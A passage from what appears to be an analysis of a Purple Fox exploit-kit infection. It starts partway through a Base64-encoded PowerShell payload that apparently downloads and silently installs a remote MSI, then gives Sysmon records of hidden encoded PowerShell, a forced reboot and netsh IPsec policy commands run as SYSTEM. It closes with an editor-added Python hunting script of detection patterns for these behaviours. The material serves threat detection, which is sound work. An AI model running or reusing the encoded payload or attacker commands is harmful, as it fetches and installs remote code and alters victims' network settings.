JAEEAUQBBAEEATgBBAEEAbwBBAEoAQQBCAHcAQQBHAEUAQQBkAEEAQgBvAEEAQwBBAEEAUABRAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFkAUQBCADMAQQBDADQAQQBaAHcAQgBwAEEASABRAEEAYQBBAEIAaABBAEcATQBBAGEAdwBBAHUAQQBIAGcAQQBl
AFEAQgA2AEEAQwA4AEEATQBRAEIARQBBAEUAZwBBAFUAZwBCAEMAQQBFAFkAQQBVAEEAQgBNAEEARgBvAEEAVgBBAEIARgBBAEYARQBBAFUAZwBCAFMAQQBFAEkAQQBWAFEAQgBDAEEAQwA0AEEAYQBnAEIAdwBBAEcAYwBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBiAEEARwAwAEEAYwB3AEIAcABBAEYAMABBAE8AZwBBADYAQQBFADAAQQBjAHcAQgBwAEEARgBNAEEAWgBRAEIAMABBAEUAawBBAGIAZwBCADAAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAYgBBAEIAVgBBAEUAawBBAEsAQQBBAHkAQQBDAHcAQQBNAEEAQQBwAEEARABzAEEARABRAEEASwBBAEYAcwBBAGIAUQBCAHoAQQBHAGsAQQBYAFEAQQA2AEEARABvAEEAVABRAEIAegBBAEcAawBBAFMAUQBCAHUAQQBIAE0AQQBkAEEAQgBoAEEARwB3AEEAYgBBAEIAUQBBAEgASQBBAGIAdwBCAGsAQQBIAFUAQQBZAHcAQgAwAEEAQwBnAEEASQBnAEEAawBBAEgAQQBBAFkAUQBCADAAQQBHAGcAQQBJAGcAQQBzAEEAQwBJAEEASQBnAEEAcABBAEEAMABBAEMAZwBBAD0AIgAnACAALQBGAG8AcgBjAGUAQQANAAoA

[Sysmon Event ID 1 – csc.exe spawned by the SYSTEM-level PowerShell, consistent with the Add-Type block in the third-layer command compiling its C# P/Invoke stub for msi.dll; the .cmdline file in %TEMP% and the csc.exe child are the on-disk trace that Add-Type leaves]
Image C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
FileVersion 8.0.50727.4927 (NetFXspW7.050727-4900)
Description Visual C# Command Line Compiler
Product Microsoft® Visual Studio® 2005
Company Microsoft Corporation
CommandLine "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Ricky\AppData\Local\Temp\4ohqsi5j.cmdline"
CurrentDirectory C:\Users\Ricky\Desktop\
User NT AUTHORITY\SYSTEM
Hashes MD5=E2107F227E1C174C20BEB7A51404BBAC
ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand 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

[Sysmon Event ID 1 – cvtres.exe, the normal child of a csc.exe compile]
Image C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
FileVersion 8.00.50727.4940 (Win7SP1.050727-5400)
Description Microsoft® Resource File To COFF Object Conversion Utility
Product Microsoft® Visual Studio® 2005
Company Microsoft Corporation
CommandLine C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Ricky\AppData\Local\Temp\RES59A5.tmp" "c:\Users\Ricky\AppData\Local\Temp\CSC59A4.tmp"
CurrentDirectory C:\Users\Ricky\Desktop\
User NT AUTHORITY\SYSTEM
Hashes MD5=449F7C92A14B7F50B898FC67202A326C
ParentImage C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
ParentCommandLine "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Ricky\AppData\Local\Temp\4ohqsi5j.cmdline"

[Sysmon Event ID 1 – MSI764E.tmp, an Advanced Installer launcher stub extracted by msiexec.exe (the silent MsiInstallProduct from the third layer), starts PowerShell to force a reboot 900 seconds later]
Image C:\Windows\Installer\MSI764E.tmp
FileVersion 16.3.0.0
Description File that launches another file
Product Advanced Installer
Company Caphyon LTD
CommandLine "C:\Windows\Installer\MSI764E.tmp" /DontWait /HideWindow "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force
CurrentDirectory C:\Windows\system32\
User NT AUTHORITY\SYSTEM
Hashes MD5=17D89C53FECC7342DCADAB11A266E969
ParentImage C:\Windows\System32\msiexec.exe
ParentCommandLine C:\Windows\system32\msiexec.exe /V

[Sysmon Event ID 1 – the delayed forced reboot, running as SYSTEM]
Image C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Windows PowerShell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force
CurrentDirectory C:\Windows\System32\WindowsPowerShell\v1.0\
User NT AUTHORITY\SYSTEM
Hashes MD5=92F44E405DB16AC55D97E3BFE3B132FA
ParentImage C:\Windows\Installer\MSI764E.tmp
ParentCommandLine "C:\Windows\Installer\MSI764E.tmp" /DontWait /HideWindow "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force

[Sysmon Event ID 1 – netsh run from the MSI custom action (32-bit msiexec.exe -Embedding parent, SYSTEM)]
Image C:\Windows\SysWOW64\netsh.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Network Command Shell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine "C:\Windows\SysWOW64\netsh.exe" interface ipv6 install
CurrentDirectory C:\Windows\SysWOW64\
User NT AUTHORITY\SYSTEM
Hashes MD5=784A50A6A09C25F011C3143DDD68E729
ParentImage C:\Windows\SysWOW64\msiexec.exe
ParentCommandLine C:\Windows\syswow64\MsiExec.exe -Embedding 3800D9B153AF719127A19E5E4E71F5D9 M Global\MSI0000

[Sysmon Event ID 1 – netsh creating a static IPsec policy named qianye]
Image C:\Windows\SysWOW64\netsh.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Network Command Shell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine "C:\Windows\SysWOW64\netsh.exe" ipsec static add policy name=qianye
CurrentDirectory C:\Windows\SysWOW64\
User NT AUTHORITY\SYSTEM
Hashes MD5=784A50A6A09C25F011C3143DDD68E729
ParentImage C:\Windows\SysWOW64\msiexec.exe
ParentCommandLine C:\Windows\syswow64\MsiExec.exe -Embedding 3800D9B153AF719127A19E5E4E71F5D9 M Global\MSI0000

[Sysmon Event ID 1 – netsh adding an inbound filter for TCP 445 (SMB) to the host (dstaddr=Me)]
Image C:\Windows\SysWOW64\netsh.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Network Command Shell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
CurrentDirectory C:\Windows\SysWOW64\
User NT AUTHORITY\SYSTEM
Hashes MD5=784A50A6A09C25F011C3143DDD68E729
ParentImage C:\Windows\SysWOW64\msiexec.exe
ParentCommandLine C:\Windows\syswow64\MsiExec.exe -Embedding 3800D9B153AF719127A19E5E4E71F5D9 M Global\MSI0000

[Sysmon Event ID 1 – netsh adding an inbound filter for TCP 135 (RPC endpoint mapper) to the same list]
Image C:\Windows\SysWOW64\netsh.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Network Command Shell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
CurrentDirectory C:\Windows\SysWOW64\
User NT AUTHORITY\SYSTEM
Hashes MD5=784A50A6A09C25F011C3143DDD68E729
ParentImage C:\Windows\SysWOW64\msiexec.exe
ParentCommandLine C:\Windows\syswow64\MsiExec.exe -Embedding 3800D9B153AF719127A19E5E4E71F5D9 M Global\MSI0000

[Sysmon Event ID 1 – netsh adding an inbound filter for TCP 139 (NetBIOS session) to the same list]
Image C:\Windows\SysWOW64\netsh.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Network Command Shell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
CurrentDirectory C:\Windows\SysWOW64\
User NT AUTHORITY\SYSTEM
Hashes MD5=784A50A6A09C25F011C3143DDD68E729
ParentImage C:\Windows\SysWOW64\msiexec.exe
ParentCommandLine C:\Windows\syswow64\MsiExec.exe -Embedding 3800D9B153AF719127A19E5E4E71F5D9 M Global\MSI0000

The three filters above cover inbound SMB and RPC to the infected host (dstaddr=Me). netsh ipsec static commands launched by msiexec.exe as SYSTEM are practically never legitimate, so the command line pattern is a good hunt on its own, independent of the policy name.
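Turning the process and network events above into hunting logic: the script below, an added example by the editor (not the post's own tooling), encodes the behaviours seen on this page as rules and runs them over Sysmon records. The records are constructed from the values in the events above, plus two benign rows to show the rules stay quiet on them; in practice you would feed it rows parsed from the Sysmon operational log or your SIEM, and the field names are Sysmon's. It goes slightly beyond the page by treating any outbound connection from wusa.exe or msdtc.exe to a non-private address as a hit rather than only the IPs seen here.

```python
import ipaddress
import re
from fnmatch import fnmatch

# PowerShell's -EncodedCommand (or an abbreviation) followed by a Base64 blob
ENCODED_SWITCH = re.compile(r"\s-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{8,}", re.IGNORECASE)
# Flags that hide the window or disable the execution policy / profile
EVASION_FLAGS = re.compile(r"-(?:windowstyle\s+hidden|w\s+hidden|exec\s+bypass|ep\s+bypass|nop)\b", re.IGNORECASE)
# System binaries that never need to open their own outbound internet sessions
NO_INTERNET_BINARIES = {"wusa.exe", "msdtc.exe"}

# Sysmon records as flat dicts, constructed from the events on this page (two benign rows added).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden '
                    r"-exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8A",
     "ParentImage": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "User": r"Ricky-PC\Ricky"},
    {"EventID": 3, "Image": r"C:\Windows\System32\msdtc.exe", "DestinationIp": "193.108.118.167",
     "DestinationPort": 443, "User": r"Ricky-PC\Ricky"},
    {"EventID": 3, "Image": r"C:\Windows\System32\wusa.exe", "DestinationIp": "38.75.137.14",
     "DestinationPort": 9000, "User": r"Ricky-PC\Ricky"},
    {"EventID": 3, "Image": r"C:\Windows\System32\svchost.exe", "DestinationIp": "10.0.0.5",
     "DestinationPort": 445, "User": r"NT AUTHORITY\SYSTEM"},  # benign: internal SMB
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths '
                    r'@"C:\Users\Ricky\AppData\Local\Temp\4ohqsi5j.cmdline"',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 1, "Image": r"C:\Windows\Installer\MSI764E.tmp",
     "CommandLine": r'"C:\Windows\Installer\MSI764E.tmp" /DontWait /HideWindow '
                    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force',
     "ParentImage": r"C:\Windows\System32\msiexec.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\netsh.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 '
                    r"srcaddr=any dstaddr=Me dstport=445 protocol=TCP",
     "ParentImage": r"C:\Windows\SysWOW64\msiexec.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"Ricky-PC\Ricky"},  # benign
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)


def hunt(events):
    """Apply the behaviour rules to Sysmon records and return (rule, image, detail) hits."""
    hits = []
    for ev in events:
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if ev["EventID"] == 1:
            if image == "powershell.exe" and ENCODED_SWITCH.search(cmd):
                flags = EVASION_FLAGS.findall(cmd)
                hits.append(("encoded_powershell", image,
                             f"user={ev.get('User')} parent={parent} evasion_flags={len(flags)}"))
            if image == "csc.exe" and parent == "powershell.exe":
                hits.append(("addtype_compile", image, "csc.exe under PowerShell: Add-Type compiling C# at runtime"))
            if image == "netsh.exe" and "ipsec static add" in cmd.lower():
                hits.append(("netsh_ipsec_policy", image, f"parent={parent} " + cmd[cmd.lower().find("ipsec"):]))
            if fnmatch(image, "msi*.tmp") and "restart-computer" in cmd.lower():
                hits.append(("msi_stub_reboot", image, f"parent={parent}"))
        elif ev["EventID"] == 3:
            dest = f"{ev.get('DestinationIp')}:{ev.get('DestinationPort')}"
            if image in NO_INTERNET_BINARIES and is_external(ev["DestinationIp"]):
                hits.append(("lolbin_outbound", image, dest))
            if image == "powershell.exe" and is_external(ev["DestinationIp"]):
                hits.append(("powershell_outbound", image, dest))
    return hits


if __name__ == "__main__":
    for rule, image, detail in hunt(SAMPLE_EVENTS):
        print(f"{rule:20} {image:14} {detail}")
```

The rules are deliberately built on parent/child relationships and command line shape rather than on the hashes or domains from this one infection, so they keep firing when the githack paths and C2 addresses rotate; the encoded PowerShell rule will also light up on some legitimate admin tooling, which is why the detail string carries the user and parent for triage.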

IMAGES AND DETAILS:


Shown above: Network traffic associated with the Purple Fox EK infection


Shown above: DNS traffic associated with the Purple Fox EK and post-infection activity